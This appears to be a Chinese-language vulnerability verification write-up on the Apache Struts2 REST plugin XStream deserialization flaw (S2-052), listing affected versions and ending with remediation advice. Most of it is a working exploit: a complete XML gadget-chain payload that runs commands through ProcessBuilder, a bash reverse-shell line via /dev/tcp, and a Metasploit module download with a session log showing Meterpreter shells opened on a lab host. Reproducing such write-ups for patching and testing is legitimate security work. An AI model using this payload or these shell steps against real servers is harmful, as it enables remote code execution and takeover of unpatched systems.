Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。Struts2启用了rest-plugin后并编写并设置了XStreamHandler后,可以导致远程命令执行这一严重问题。实际场景中存在一定局限性,需要满足一定条件,非struts本身默认开启的组件。
影响版本:
Version 2.5.0 to 2.5.12
Version 2.3.0 to 2.3.33
修复版本:
Struts 2.5.13
Struts 2.3.34
漏洞验证:
从struts2的官网下载最后受影响的版本struts-2.5.12,地址: http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip
部署项目struts2-rest-showcase.war,Edit后提交的时候,截断数据包。
修改Content-Type: application/xml
修改POST内容为:
<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>C:/Windows/system32/calc.exe</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map>
需要注意JDK版本为1.8,低版本的JDK测试不行。
POC command标签内的空格需要以分开是string标签形式。
例如touch /tmp/xxx
需要写成
<command> <string>touch</string> <string>/tmp/xxx</string> </command>
Linux下实际测试自己搭建环境(CentOS6.5 apache-tomcat-8.0.46)
创建文件可以
<command> <string>touch</string> <string>/tmp/xxx</string> </command>
但是使用如下POC无法反弹shell(只能发出连接,无法反弹Bash),不知道和环境是否有关系。
<command> <string>bash</string> <string>-c</string> <string>bash -i >& /dev/tcp/x.x.x.x/port 0>&1</string> </command>
还有测试过程如果不行可以清空tomcat目录下work目录再试试。
Linux下获取meterpreter
wget https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rb
cp struts2_rest_xstream.rb /usr/share/metasploit-framework/modules/exploits/multi/http/
msfconsole
msf > use exploit/multi/http/struts2_rest_xstream msf exploit(struts2_rest_xstream) > set rhost 172.16.100.155 rhost => 172.16.100.155 msf exploit(struts2_rest_xstream) > set lhost 172.16.100.177 lhost => 172.16.100.177 msf exploit(struts2_rest_xstream) > show options Module options (exploit/multi/http/struts2_rest_xstream): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 172.16.100.155 yes The target address RPORT 8080 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI /struts2-rest-showcase/orders/3 yes Path to Struts app URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (linux/x64/meterpreter_reverse_https): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.16.100.177 yes The local listener hostname LPORT 8443 yes The local listener port LURI no The HTTP Path Exploit target: Id Name -- ---- 0 Apache Struts 2.5 - 2.5.12 msf exploit(struts2_rest_xstream) > exploit [*] Started HTTPS reverse handler on https://172.16.100.177:8443 [*] Using URL: http://0.0.0.0:8080/tD86RKaLdwV [*] Local IP: http://172.16.100.177:8080/tD86RKaLdwV [*] Command Stager progress - 100.00% done (118/118 bytes) [*] Server stopped. [*] Exploit completed, but no session was created. msf exploit(struts2_rest_xstream) > exploit [*] Started HTTPS reverse handler on https://172.16.100.177:8443 [*] Using URL: http://0.0.0.0:8080/CFpeUWr3UO3b7s5 [*] Local IP: http://172.16.100.177:8080/CFpeUWr3UO3b7s5 [*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Redirecting stageless connection from /rw7AbVJ4D8RcPFo-BYSmjA9L-dN7OPSB7NnI1R5R97ZHeZ8zC6CFm7WTV9KBp4CWjTHPZ2nnj_9tLmcClEo3QwMO8YXRdG4HGoLfAcOWNx43fBFbD with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' [*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Attaching orphaned/stageless session... [*] Meterpreter session 1 opened (172.16.100.177:8443 -> 172.16.100.155:58051) at 2017-09-13 17:32:56 +0800 [+] negotiating tlv encryption [+] negotiated tlv encryption [+] negotiated tlv encryption [*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Redirecting stageless connection from /hkiZkZ_fW9LcAdoDhbknRgM_qsJFpQYWAWkJT5Qjt8QVFopVe0ypSG-eoVv9eKJp5I_n0ZKxaKy66ZT with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' [*] https://172.16.100.177:8443 handling request from 172.16.100.155; (UUID: tre5vh55) Attaching orphaned/stageless session... [*] Meterpreter session 2 opened (172.16.100.177:8443 -> 172.16.100.155:53330) at 2017-09-13 17:33:04 +0800 [+] negotiating tlv encryption [+] negotiated tlv encryption [+] negotiated tlv encryption [*] Command Stager progress - 100.00% done (122/122 bytes) [*] Server stopped. meterpreter > sysinfo Computer : 172.16.100.155 OS : CentOS 6.5 (Linux 2.6.39) Architecture : x64 Meterpreter : x64/linux
修复建议:
1.官方建议设置插件处理的数据类型限定为json
<constant name=”struts.action.extension” value=”xhtml,,json” />
2.升级Struts到2.5.13版本或2.3.34版本
3.在XStreamHandler中进行数据校验或检查
参考文章:
http://bobao.360.cn/learning/detail/4372.html
https://github.com/jas502n/St2-052